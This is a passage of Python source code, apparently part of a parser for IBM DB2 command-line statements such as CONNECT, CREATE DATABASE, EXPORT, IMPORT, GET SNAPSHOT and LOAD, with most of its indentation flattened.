elif self._match_sequence(['NETBIOS', 'NODE']):
self._expect_clp_string()
self._expect('REMOTE')
self._expect_clp_string()
self._expect('ADAPTER')
self._expect(TT.NUMBER)
if self._match('REMOTE_INSTANCE'):
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
elif self._match_one_of(['TCPIP', 'TCPIP4', 'TCPIP6']):
self._expect('NODE')
self._expect_clp_string()
self._expect('REMOTE')
self._expect_clp_string()
self._expect('SERVER')
self._expect_clp_string()
if self._match('SECURITY'):
self._match_one_of(['SOCKS', 'SSL'])
if self._match('REMOTE_INSTANCE'):
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
else:
self._expected_one_of([
'LOCAL',
'NPIPE',
'NETBIOS',
'TCPIP',
'TCPIP4',
'TCPIP6',
])
def _parse_connect_command(self):
"""Parses a CONNECT command"""
# CONNECT already matched
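        # Hypothetical examples (names illustrative, not from the source):
        #   CONNECT TO sample
        #   CONNECT RESET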
if self._expect_one_of(['TO', 'RESET']).value == 'RESET':
self.current_connection = None
else:
database = self._expect_clp_string().value
if self._match('IN'):
if self._expect_one_of(['SHARE', 'EXCLUSIVE']).value == 'EXCLUSIVE':
self._expect('MODE')
if self._match('ON'):
self._expect('SINGLE')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
else:
self._expect('MODE')
(username, password) = self._parse_login(optional=True, allowchange=True)
self.current_connection = Connection(self.current_instance, database, username, password)
self.connections.append(self.current_connection)
def _parse_create_database_command(self):
"""Parses a CREATE DATABASE command"""
def parse_tablespace_definition():
self._expect('MANAGED')
self._expect('BY')
if self._match('SYSTEM'):
self._expect('USING')
self._parse_system_container_clause()
elif self._match('DATABASE'):
self._expect('USING')
self._parse_database_container_clause()
elif self._match('AUTOMATIC'):
self._expect('STORAGE')
if self._match('EXTENTSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M'])
if self._match('PREFETCHSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
if self._match('OVERHEAD'):
self._expect(TT.NUMBER)
if self._match('TRANSFERRATE'):
self._expect(TT.NUMBER)
if self._match('NO'):
self._expect_sequence(['FILE', 'SYSTEM', 'CACHING'])
elif self._match('FILE'):
self._expect_sequence(['SYSTEM', 'CACHING'])
self._parse_tablespace_size_attributes()
# CREATE [DATABASE|DB] already matched
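        # Hypothetical example (names illustrative, not from the source):
        #   CREATE DATABASE sample ON /data DBPATH ON /home/db2inst1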
self._expect_clp_string()
# XXX Implement AT DBPARTITIONNUM? (not for general use, etc.)
if self._match('AUTOMATIC'):
self._expect('STORAGE')
self._expect_one_of(['NO', 'YES'])
if self._match('ON'):
self._parse_clp_string_list()
if self._match('DBPATH'):
self._expect('ON')
self._expect_clp_string()
if self._match('ALIAS'):
self._expect_clp_string()
if self._match('USING'):
self._expect('CODESET')
self._expect_clp_string()
if self._match('TERRITORY'):
self._expect_clp_string()
if self._match('COLLATE'):
self._expect('USING')
self._expect(TT.IDENTIFIER)
if self._match('PAGESIZE'):
self._expect(TT.NUMBER)
self._match('K')
if self._match('NUMSEGS'):
self._expect(TT.NUMBER)
if self._match('DFT_EXTENT_SZ'):
self._expect(TT.NUMBER)
self._match('RESTRICTIVE')
if self._match('CATALOG'):
self._expect('TABLESPACE')
parse_tablespace_definition()
if self._match('USER'):
self._expect('TABLESPACE')
parse_tablespace_definition()
if self._match('TEMPORARY'):
self._expect('TABLESPACE')
parse_tablespace_definition()
if self._match('WITH'):
self._expect_clp_string()
if self._match('AUTOCONFIGURE'):
self._parse_autoconfigure_command()
def _parse_create_tools_catalog_command(self):
"""Parses a CREATE TOOLS CATALOG command"""
# CREATE TOOLS CATALOG already matched
self._expect_clp_string()
if self._match('CREATE'):
self._expect('NEW')
self._expect('DATABASE')
self._expect_clp_string()
elif self._match('USE'):
self._expect('EXISTING')
if self._match('TABLESPACE'):
self._expect(TT.IDENTIFIER)
self._expect('DATABASE')
self._expect_clp_string()
self._match('FORCE')
if self._match('KEEP'):
self._expect('INACTIVE')
def _parse_deactivate_database_command(self):
"""Parses a DEACTIVATE DATABASE command"""
# DEACTIVATE [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_decompose_xml_document(self):
"""Parses a DECOMPOSE XML DOCUMENT command"""
# DECOMPOSE XML DOCUMENT already matched
self._expect_clp_string()
self._expect('XMLSCHEMA')
self._parse_subschema_name()
self._match('VALIDATE')
def _parse_decompose_xml_documents(self):
"""Parses a DECOMPOSE XML DOCUMENTS command"""
# DECOMPOSE XML DOCUMENTS already matched
self._expect('IN')
self._parse_select_statement()
self._expect('XMLSCHEMA')
self._parse_subschema_name()
self._match('VALIDATE')
if self._match('ALLOW'):
self._match('NO')
self._expect('ACCESS')
if self._match('COMMITCOUNT'):
self._expect(TT.NUMBER)
self._match_sequence(['CONTINUE', 'ON', 'ERROR'])
if self._match('MESSAGES'):
self._expect_clp_string()
def _parse_deregister_command(self):
"""Parses a DEREGISTER command"""
# DEREGISTER already matched
self._match_sequence(['DB2', 'SERVER'])
self._match('IN')
self._expect_sequence(['LDAP', 'NODE', TT.IDENTIFIER])
self._parse_login(optional=True, allowchange=False)
def _parse_describe_command(self):
"""Parses a DESCRIBE command"""
# DESCRIBE already matched
table = True
if self._match('TABLE'):
pass
elif self._match_sequence(['INDEXES', 'FOR', 'TABLE']):
pass
elif self._match_sequence(['RELATIONAL', 'DATA']) or self._match_sequence(['XML', 'DATA']) or self._match_sequence(['TEXT', 'SEARCH']):
self._expect_sequence(['INDEXES', 'FOR', 'TABLE'])
elif self._match_sequence(['DATA', 'PARTITIONS', 'FOR', 'TABLE']):
pass
else:
table = False
if table:
self._parse_table_name()
self._match_sequence(['SHOW', 'DETAIL'])
else:
self._match('OUTPUT')
self._save_state()
try:
self._parse_select_statement()
except ParseError:
self._restore_state()
self._parse_call_statement()
else:
self._forget_state()
# XXX Add support for XQUERY?
def _parse_detach_command(self):
"""Parses a DETACH command"""
# DETACH already matched
pass
def _parse_disconnect_command(self):
"""Parses a DISCONNECT command"""
# DISCONNECT already matched
if self._match('ALL'):
self._match('SQL')
self.current_connection = None
elif self._match('CURRENT'):
self.current_connection = None
else:
t = self._expect_clp_string()
            if self.current_connection is not None and isinstance(self.current_connection.database, basestring) and self.current_connection.database.lower() == t.value.lower():
self.current_connection = None
def _parse_drop_contact_command(self):
"""Parses a DROP CONTACT command"""
# DROP CONTACT already matched
self._expect_clp_string()
def _parse_drop_contactgroup_command(self):
"""Parses a DROP CONTACTGROUP command"""
# DROP CONTACTGROUP already matched
self._expect_clp_string()
def _parse_drop_database_command(self):
"""Parses a DROP DATABASE command"""
# DROP [DATABASE|DB] already matched
self._expect_clp_string()
if self._match('AT'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
def _parse_drop_dbpartitionnum_verify_command(self):
"""Parses a DROP DBPARTITIONNUM VERIFY command"""
# DROP DBPARTITIONNUM VERIFY already matched
pass
def _parse_drop_tools_catalog_command(self):
"""Parses a DROP TOOLS CATALOG command"""
# DROP TOOLS CATALOG already matched
self._expect_clp_string()
self._expect('IN')
self._expect('DATABASE')
self._expect_clp_string()
self._match('FORCE')
def _parse_echo_command(self):
"""Parses an ECHO command"""
# ECHO already matched
self._match_clp_string()
def _parse_export_command(self):
"""Parses a EXPORT command"""
# EXPORT already matched
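        # Hypothetical example (names illustrative, not from the source):
        #   EXPORT TO staff.del OF DEL MESSAGES export.msg SELECT * FROM staff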
self._expect('TO')
self.produces.append((self._expect_clp_string().value, self.current_connection))
self._expect('OF')
self._expect_one_of(['DEL', 'IXF', 'WSF'])
if self._match('LOBS'):
self._expect('TO')
self._parse_clp_string_list()
if self._match('LOBFILE'):
self._parse_clp_string_list()
if self._match_sequence(['XML', 'TO']):
self._parse_clp_string_list()
if self._match('XMLFILE'):
self._parse_clp_string_list()
if self._match('MODIFIED'):
self._expect('BY')
# The syntax of MODIFIED BY is so incongruous with the parser that
# we don't even try and parse it, just skip tokens until we find
# some "normal" syntax again. Unfortunately, this means the error
# handling becomes rather dumb
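            # For example, given the (hypothetical) input
            #   MODIFIED BY nochardel datesiso MESSAGES export.msg
            # all tokens between BY and MESSAGES are passed through verbatim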
i = self._index
while True:
if self._token(i).value in [
'XMLSAVESCHEMA',
'METHOD',
'MESSAGES',
'HIERARCHY',
'WITH',
'SELECT',
'VALUES',
]:
while self._index < i:
self._output.append(self._token())
self._index += 1
break
if self._token(i).type == TT.EOF:
raise ParseError("Unable to find end of file-modifiers in EXPORT statement")
i += 1
self._match('XMLSAVESCHEMA')
if self._match('METHOD'):
self._expect('N')
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('MESSAGES'):
self._expect_clp_string()
if self._match('HIERARCHY'):
if self._match('STARTING'):
self._expect(TT.IDENTIFIER)
else:
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('WHERE'):
self._parse_search_condition()
else:
self._parse_select_statement()
# XXX Add support for XQUERY?
def _parse_force_application_command(self):
"""Parses a FORCE APPLICATION command"""
# FORCE APPLICATION already matched
if self._match('('):
self._parse_number_list()
self._expect(')')
else:
self._expect('ALL')
if self._match('MODE'):
self._expect('ASYNC')
def _parse_get_admin_cfg_command(self):
"""Parses a GET ADMIN CFG command"""
# GET ADMIN [CONFIGURATION|CONFIG|CFG] already matched
if self._match('FOR'):
self._expect_sequence(['NODE', TT.IDENTIFIER])
self._parse_login(optional=True, allowchange=False)
def _parse_get_alert_cfg_command(self):
"""Parses a GET ALERT CFG command"""
# GET ALERT [CONFIGURATION|CONFIG|CFG] already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match_one_of(['DBM', 'DATABASES', 'CONTAINERS', 'TABLESPACES'])
):
self._match('DEFAULT')
elif (
self._match('DATABASE')
or self._match_sequence(['TABLESPACE', TT.IDENTIFIER])
or self._match_sequence(['CONTAINER', TT.IDENTIFIER, 'FOR', TT.IDENTIFIER])
):
self._expect('ON')
self._expect_clp_string()
else:
self._expected_one_of([
'DB',
'DBM',
'DATABASE',
'DATABASES',
'TABLESPACE',
'TABLESPACES',
'CONTAINER',
'CONTAINERS',
])
if self._match('USING'):
self._parse_clp_string_list()
def _parse_get_cli_cfg_command(self):
"""Parses a GET CLI CFG command"""
# GET CLI [CONFIGURATION|CONFIG|CFG] already matched
self._match_sequence(['AT', 'GLOBAL', 'LEVEL'])
if self._match_sequence(['FOR', 'SECTION']):
self._expect_clp_string()
def _parse_get_connection_state_command(self):
"""Parses a GET CONNECTION STATE command"""
# GET CONNECTION STATE already matched
pass
def _parse_get_contactgroup_command(self):
"""Parses a GET CONTACTGROUP command"""
# GET CONTACTGROUP already matched
self._expect_clp_string()
def _parse_get_contactgroups_command(self):
"""Parses a GET CONTACTGROUPS command"""
# GET CONTACTGROUPS already matched
pass
def _parse_get_contacts_command(self):
"""Parses a GET CONTACTS command"""
# GET CONTACTS already matched
pass
def _parse_get_db_cfg_command(self):
"""Parses a GET DB CFG command"""
# GET [DATABASE|DB] [CONFIGURATION|CONFIG|CFG] already matched
if self._match('FOR'):
self._expect_clp_string()
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_get_dbm_cfg_command(self):
"""Parses a GET DBM CFG command"""
# GET [DATABASE MANAGER|DB MANAGER|DBM] [CONFIGURATION|CONFIG|CFG] already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_get_dbm_monitor_switches_command(self):
"""Parses a GET DBM MONITOR SWITCHES command"""
# GET [DATABASE MANAGER|DB MANAGER|DBM] MONITOR SWITCHES already matched
self._parse_db_partition_clause()
def _parse_get_description_for_health_indicator_command(self):
"""Parses a GET DESCRIPTION FOR HEALTH INDICATOR command"""
# GET DESCRIPTION FOR HEALTH INDICATOR already matched
self._expect_clp_string()
def _parse_get_notification_list_command(self):
"""Parses a GET NOTIFICATION LIST command"""
# GET [HEALTH] NOTIFICATION [CONTACT] LIST already matched
pass
def _parse_get_health_snapshot_command(self):
"""Parses a GET HEALTH SNAPSHOT command"""
# GET HEALTH SNAPSHOT already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match('DBM')
or self._match_sequence(['ALL', 'DATABASES'])
):
pass
elif self._match_one_of(['ALL', 'DATABASE', 'DB', 'TABLESPACES']):
self._expect('ON')
self._expect_clp_string()
else:
self._expected_one_of([
'DB',
'DATABASE',
'DBM',
'ALL',
'TABLESPACES',
])
self._parse_db_partition_clause()
self._match_sequence(['SHOW', 'DETAIL'])
self._match_sequence(['WITH', 'FULL', 'COLLECTION'])
def _parse_get_instance_command(self):
"""Parses a GET INSTANCE command"""
# GET INSTANCE already matched
pass
def _parse_get_monitor_switches_command(self):
"""Parses a GET MONITOR SWITCHES command"""
# GET MONITOR SWITCHES already matched
self._parse_db_partition_clause()
def _parse_get_recommendations_for_health_indicator_command(self):
"""Parses a GET RECOMMENDATIONS FOR HEALTH INDICATOR command"""
# GET RECOMMENDATIONS FOR HEALTH INDICATOR already matched
self._expect_clp_string()
if self._match('FOR'):
if not self._match('DBM'):
if self._match('TABLESPACE'):
self._expect(TT.IDENTIFIER)
elif self._match('CONTAINER'):
self._expect_clp_string()
self._expect_sequence(['FOR', 'TABLESPACE', TT.IDENTIFIER])
elif self._match('DATABASE'):
pass
else:
self._expected_one_of(['TABLESPACE', 'CONTAINER', 'DATABASE', 'DBM'])
self._expect('ON')
self._expect_clp_string()
self._parse_db_partition_clause()
def _parse_get_routine_command(self):
"""Parses a GET ROUTINE command"""
# GET ROUTINE already matched
self._expect('INTO')
self._expect_clp_string()
self._expect('FROM')
self._match('SPECIFIC')
self._expect('PROCEDURE')
self._parse_routine_name()
self._match_sequence(['HIDE', 'BODY'])
def _parse_get_snapshot_command(self):
"""Parses a GET SNAPSHOT command"""
# GET SNAPSHOT already matched
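        # Hypothetical examples (names illustrative, not from the source):
        #   GET SNAPSHOT FOR ALL DATABASES
        #   GET SNAPSHOT FOR DYNAMIC SQL ON sample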
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match('DBM')
or self._match_sequence(['ALL', 'DCS', 'DATABASES'])
or self._match_sequence(['ALL', 'DATABASES'])
or self._match_sequence(['ALL', 'DCS', 'APPLICATIONS'])
or self._match_sequence(['ALL', 'APPLICATIONS'])
or self._match_sequence(['ALL', 'BUFFERPOOLS'])
or self._match_sequence(['FCM', 'FOR', 'ALL', 'DBPARTITIONNUMS'])
or self._match_sequence(['FCM', 'FOR', 'ALL', 'NODES'])
or (self._match_sequence(['DCS', 'APPLICATION', 'APPLID']) and self._match_clp_string())
or self._match_sequence(['DCS', 'APPLICATION', 'AGENTID', TT.NUMBER])
or (self._match_sequence(['APPLICATION', 'APPLID']) and self._match_clp_string())
or self._match_sequence(['APPLICATION', 'AGENTID', TT.NUMBER])
or (self._match_sequence(['LOCKS', 'FOR', 'APPLICATION', 'APPLID']) and self._match_clp_string())
or self._match_sequence(['LOCKS', 'FOR', 'APPLICATION', 'AGENTID', TT.NUMBER])
or self._match_sequence(['ALL', 'REMOTE_DATABASES'])
or self._match_sequence(['ALL', 'REMOTE_APPLICATIONS'])
):
pass
elif self._match_sequence(['DYNAMIC', 'SQL', 'ON']):
self._expect_clp_string()
self._match_sequence(['WRITE', 'TO', 'FILE'])
elif (
self._match('ALL')
or self._match_sequence(['DCS', 'DATABASE'])
or self._match_sequence(['DCS', 'DB'])
or self._match_sequence(['DCS', 'APPLICATIONS'])
or self._match_one_of([
'DATABASE',
'APPLICATIONS',
'TABLES',
'TABLESPACES',
'LOCKS',
'BUFFERPOOLS',
'REMOTE_DATABASES',
'REMOTE_APPLICATIONS'
])
):
self._expect('ON')
self._expect_clp_string()
else:
self._expected_one_of([
'ALL',
'DCS',
'DB',
'DBM',
'DATABASE',
'FCM',
'DYNAMIC',
'APPLICATION',
'APPLICATIONS',
'TABLES',
'TABLESPACES',
'LOCKS',
'BUFFERPOOLS',
'REMOTE_DATABASES',
'REMOTE_APPLICATIONS',
])
self._parse_db_partition_clause()
def _parse_import_method(self):
"""Parses the METHOD clause of an IMPORT/LOAD command"""
# METHOD already matched
if self._match('L'):
self._expect('(')
while True:
self._expect(TT.NUMBER) # col start
self._expect(TT.NUMBER) # col end
if not self._match(','):
break
self._expect(')')
if self._match('NULL'):
self._expect('INDICATORS')
self._expect('(')
self._parse_number_list()
self._expect(')')
elif self._match('N'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
elif self._match('P'):
self._expect('(')
self._parse_number_list()
self._expect(')')
else:
self._expected_one_of(['L', 'N', 'P'])
def _parse_import_command(self):
"""Parses a IMPORT command"""
# IMPORT already matched
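        # Hypothetical example (names illustrative, not from the source):
        #   IMPORT FROM staff.del OF DEL MESSAGES import.msg INSERT INTO staff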
self._expect('FROM')
self.consumes.append((self._expect_clp_string().value, self.current_connection))
self._expect('OF')
self._expect_one_of(['ASC', 'DEL', 'IXF', 'WSF'])
if self._match('LOBS'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('XML'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('MODIFIED'):
self._expect('BY')
# See _parse_export_command() above for an explanation...
i = self._index
while True:
if self._token(i).value in [
'METHOD',
'COMMITCOUNT',
'RESTARTCOUNT',
'SKIPCOUNT',
'ROWCOUNT',
'WARNINGCOUNT',
'NOTIMEOUT',
'INSERT_UPDATE',
'REPLACE',
'REPLACE_CREATE',
'MESSAGES',
'INSERT',
'CREATE',
'ALLOW',
'XMLPARSE',
'XMLVALIDATE',
]:
while self._index < i:
self._output.append(self._token())
self._index += 1
break
if self._token(i).type == TT.EOF:
raise ParseError("Unable to find end of file-modifiers in IMPORT statement")
i += 1
if self._match('METHOD'):
self._parse_import_method()
if self._match('XMLPARSE'):
self._expect_one_of(['STRIP', 'PRESERVE'])
self._expect('WHITESPACE')
if self._match('XMLVALIDATE'):
self._expect('USING')
if self._match('XDS'):
if self._match('DEFAULT'):
self._parse_subschema_name()
if self._match('IGNORE'):
self._expect('(')
while True:
self._parse_subschema_name()
if not self._match(','):
break
self._expect(')')
if self._match('MAP'):
self._expect('(')
while True:
self._expect('(')
self._parse_subschema_name()
self._expect(',')
self._parse_subschema_name()
self._expect(')')
if not self._match(','):
break
self._expect(')')
elif self._match('SCHEMA'):
self._parse_subschema_name()
elif self._match('SCHEMALOCATION'):
self._expect('HINTS')
if self._match('ALLOW'):
self._expect_one_of(['NO', 'WRITE'])
self._expect('ACCESS')
if self._match('COMMITCOUNT'):
self._expect_one_of([TT.NUMBER, 'AUTOMATIC'])
if self._match_one_of(['RESTARTCOUNT', 'SKIPCOUNT']):
self._expect(TT.NUMBER)
if self._match('ROWCOUNT'):
self._expect(TT.NUMBER)
if self._match('WARNINGCOUNT'):
self._expect(TT.NUMBER)
if self._match('NOTIMEOUT'):
pass
if self._match('MESSAGES'):
self._expect_clp_string()
# Parse the action (CREATE/INSERT/etc.)
t = self._expect_one_of([
'CREATE',
'INSERT',
'INSERT_UPDATE',
'REPLACE',
'REPLACE_CREATE',
])
self._expect('INTO')
self._parse_table_name()
if self._match('('):
self._parse_ident_list()
self._expect(')')
if (t.value == 'CREATE') and self._match('IN'):
self._expect(TT.IDENTIFIER)
if self._match('INDEX'):
self._expect('IN')
self._expect(TT.IDENTIFIER)
if self._match('LONG'):
self._expect('IN')
self._expect(TT.IDENTIFIER)
def _parse_initialize_tape_command(self):
"""Parses an INTIALIZE TAPE command"""
# INITIALIZE TAPE already matched
if self._match('ON'):
self._expect_clp_string()
if self._match('USING'):
self._expect(TT.NUMBER)
def _parse_inspect_command(self):
"""Parses an INSPECT command"""
# INSPECT already matched
if self._match('ROWCOMPESTIMATE'):
self._expect('TABLE')
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif self._match('TBSPACEID'):
self._expect_sequence([TT.NUMBER, 'OBJECTID', TT.NUMBER])
elif self._match('CHECK'):
if self._match('DATABASE'):
if self._match('BEGIN'):
self._expect_sequence(['TBSPACEID', TT.NUMBER])
self._match_sequence(['OBJECTID', TT.NUMBER])
elif self._match('TABLESPACE'):
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
elif self._match('TBSPACEID'):
self._expect(TT.NUMBER)
if self._match('BEGIN'):
self._expect_sequence(['OBJECTID', TT.NUMBER])
if self._match('TABLE'):
if self._match('NAME'):
self._expect(TT.IDENTIFIER)
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif self._match('TBSPACEID'):
self._expect_sequence([TT.NUMBER, 'OBJECTID', TT.NUMBER])
else:
self._expected_one_of(['ROWCOMPESTIMATE', 'CHECK'])
self._match_sequence(['FOR', 'ERROR', 'STATE', 'ALL'])
if self._match_sequence(['LIMIT', 'ERROR', 'TO']):
self._expect_one_of(['DEFAULT', 'ALL', TT.NUMBER])
if self._match('EXTENTMAP'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('DATA'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('BLOCKMAP'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('INDEX'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('LONG'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('LOB'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
if self._match('XML'):
self._expect_one_of(['NORMAL', 'NONE', 'LOW'])
self._match('INDEXDATA')
self._expect('RESULTS')
self._match('KEEP')
self._expect_clp_string()
self._parse_db_partitions_clause()
def _parse_instance_command(self):
"""Parses the custom (non-CLP) INSTANCE command"""
# INSTANCE already matched
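        # Example (instance name illustrative): "INSTANCE db2inst1" switches
        # the instance that subsequent commands are assumed to run against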
self.current_instance = self._expect_clp_string().value
self.current_connection = None
def _parse_list_active_databases_command(self):
"""Parses a LIST ACTIVE DATABASES command"""
# LIST ACTIVE DATABASES already matched
self._parse_db_partition_clause()
def _parse_list_applications_command(self):
"""Parses a LIST APPLICATIONS command"""
# LIST APPLICATIONS already matched
if self._match('FOR'):
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_db_partition_clause()
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_command_options_command(self):
"""Parses a LIST COMMAND OPTIONS command"""
# LIST COMMAND OPTIONS already matched
pass
def _parse_list_db_directory_command(self):
"""Parses a LIST DB DIRECTORY command"""
# LIST [DATABASE|DB] DIRECTORY already matched
if self._match('ON'):
self._expect_clp_string()
def _parse_list_database_partition_groups_command(self):
"""Parses a LIST DATABASE PARTITION GROUPS command"""
# LIST DATABASE PARTITION GROUPS already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_nodes_command(self):
"""Parses a LIST NODES command"""
# LIST DBPARTITIONNUMS|NODES already matched
pass
def _parse_list_dcs_applications_command(self):
"""Parses a LIST DCS APPLICATIONS command"""
# LIST DCS APPLICATIONS already matched
if not self._match('EXTENDED'):
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_dcs_directory_command(self):
"""Parses a LIST DCS DIRECTORY command"""
# LIST DCS DIRECTORY already matched
pass
def _parse_list_drda_indoubt_transactions_command(self):
"""Parses a LIST DRDA INDOUBT TRANSACTIONS command"""
# LIST DRDA INDOUBT TRANSACTIONS already matched
self._match_sequence(['WITH', 'PROMPTING'])
def _parse_list_history_command(self):
"""Parses a LIST HISTORY command"""
# LIST HISTORY already matched
if self._match_one_of(['CREATE', 'ALTER', 'RENAME']):
self._expect('TABLESPACE')
elif self._match('ARCHIVE'):
self._expect('LOG')
elif self._match('DROPPED'):
self._expect('TABLE')
else:
self._match_one_of(['BACKUP', 'ROLLFORWARD', 'LOAD', 'REORG'])
if self._match('SINCE'):
self._expect(TT.NUMBER)
elif self._match('CONTAINING'):
self._parse_subschema_name()
elif not self._match('ALL'):
self._expected_one_of(['ALL', 'SINCE', 'CONTAINING'])
self._expect('FOR')
self._match_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
def _parse_list_indoubt_transactions_command(self):
"""Parses a LIST INDOUBT TRANSACTIONS command"""
# LIST INDOUBT TRANSACTIONS already matched
self._match_sequence(['WITH', 'PROMPTING'])
def _parse_list_node_directory_command(self):
"""Parses a LIST NODE DIRECTORY command"""
# LIST [ADMIN] NODE DIRECTORY already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_odbc_data_sources_command(self):
"""Parses a LIST ODBC DATA SOURCES command"""
# LIST [USER|SYSTEM] ODBC DATA SOURCES already matched
pass
def _parse_list_tables_command(self):
"""Parses a LIST TABLES command"""
# LIST PACKAGES|TABLES already matched
if self._match('FOR'):
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif not self._match_one_of(['USER', 'SYSTEM', 'ALL']):
self._expected_one_of(['USER', 'SYSTEM', 'ALL', 'SCHEMA'])
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_tablespace_containers_command(self):
"""Parses a LIST TABLESPACE CONTAINERS command"""
# LIST TABLESPACE CONTAINERS already matched
self._expect_sequence(['FOR', TT.NUMBER])
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_tablespaces_command(self):
"""Parses a LIST TABLESPACES command"""
# LIST TABLESPACES already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_list_utilities_command(self):
"""Parses a LIST UTILITIES command"""
# LIST UTILITIES already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_load_command(self):
"""Parses a LOAD command"""
# LOAD already matched
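        # Hypothetical example (names illustrative, not from the source):
        #   LOAD FROM staff.del OF DEL MESSAGES load.msg REPLACE INTO staff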
self._match('CLIENT')
self._expect('FROM')
filename = self._expect_clp_string().value
self._expect('OF')
if self._expect_one_of(['ASC', 'DEL', 'IXF', 'CURSOR']).value != 'CURSOR':
self.consumes.append((filename, self.current_connection))
if self._match('LOBS'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('XML'):
self._expect('FROM')
self._parse_clp_string_list()
if self._match('MODIFIED'):
self._expect('BY')
# See _parse_export_command() above for an explanation...
i = self._index
while True:
                if self._token(i).value in [
'INSERT',
'MESSAGES',
'METHOD',
'REPLACE',
'RESTART',
'ROWCOUNT',
'SAVECOUNT',
'TEMPFILES',
'TERMINATE',
'WARNINGCOUNT',
'XMLPARSE',
'XMLVALIDATE',
]:
while self._index < i:
self._output.append(self._token())
self._index += 1
break
if self._token(i).type == TT.EOF:
raise ParseError("Unable to find end of file-modifiers in LOAD statement")
i += 1
if self._match('METHOD'):
self._parse_import_method()
if self._match('XMLPARSE'):
self._expect_one_of(['STRIP', 'PRESERVE'])
self._expect('WHITESPACE')
if self._match('XMLVALIDATE'):
self._expect('USING')
if self._match('XDS'):
if self._match('DEFAULT'):
self._parse_subschema_name()
if self._match('IGNORE'):
self._expect('(')
while True:
self._parse_subschema_name()
if not self._match(','):
break
self._expect(')')
if self._match('MAP'):
self._expect('(')
while True:
self._expect('(')
self._parse_subschema_name()
self._expect(',')
self._parse_subschema_name()
self._expect(')')
if not self._match(','):
break
self._expect(')')
elif self._match('SCHEMA'):
self._parse_subschema_name()
elif self._match('SCHEMALOCATION'):
self._expect('HINTS')
if self._match('SAVECOUNT'):
self._expect(TT.NUMBER)
if self._match('ROWCOUNT'):
self._expect(TT.NUMBER)
if self._match('WARNINGCOUNT'):
self._expect(TT.NUMBER)
if self._match('MESSAGES'):
self._expect_clp_string()
if self._match('TEMPFILES'):
self._expect('PATH')
self._expect_clp_string()
if self._expect_one_of(['INSERT', 'RESTART', 'REPLACE', 'TERMINATE']).value == 'REPLACE':
self._match_one_of(['KEEPDICTIONARY', 'RESETDICTIONARY'])
self._expect('INTO')
self._parse_table_name()
if self._match('('):
self._parse_ident_list()
self._expect(')')
if self._match('FOR'):
self._expect('EXCEPTION')
self._parse_table_name()
if self._match_one_of(['NORANGEEXC', 'NOUNIQUEEXC']):
if self._match(','):
self._expect_one_of(['NORANGEEXC', 'NOUNIQUEEXC'])
if self._match('STATISTICS'):
if self._expect_one_of(['NO', 'USE']).value == 'USE':
self._expect('PROFILE')
if self._match('COPY'):
if self._expect_one_of(['NO', 'YES']).value == 'YES':
if self._match('USE'):
self._expect('TSM')
if self._match('OPEN'):
self._expect_sequence([TT.NUMBER, 'SESSIONS'])
elif self._match('TO'):
self._parse_clp_string_list()
elif self._match('LOAD'):
self._expect_clp_string()
if self._match('OPEN'):
self._expect_sequence([TT.NUMBER, 'SESSIONS'])
else:
self._expected_one_of(['USE', 'TO', 'LOAD'])
elif self._match('NONRECOVERABLE'):
pass
if self._match('WITHOUT'):
self._expect('PROMPTING')
if self._match('DATA'):
self._expect('BUFFER')
self._expect(TT.NUMBER)
if self._match('SORT'):
self._expect('BUFFER')
self._expect(TT.NUMBER)
if self._match('CPU_PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('DISK_PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('FETCH_PARALLELISM'):
self._expect_one_of(['YES', 'NO'])
if self._match('INDEXING'):
self._expect('MODE')
self._expect_one_of(['AUTOSELECT', 'REBUILD', 'INCREMENTAL', 'DEFERRED'])
if self._match('ALLOW'):
if self._match_sequence(['READ', 'ACCESS']):
self._match_sequence(['USE', TT.IDENTIFIER])
elif self._match_sequence(['NO', 'ACCESS']):
pass
else:
self._expected_one_of(['READ', 'NO'])
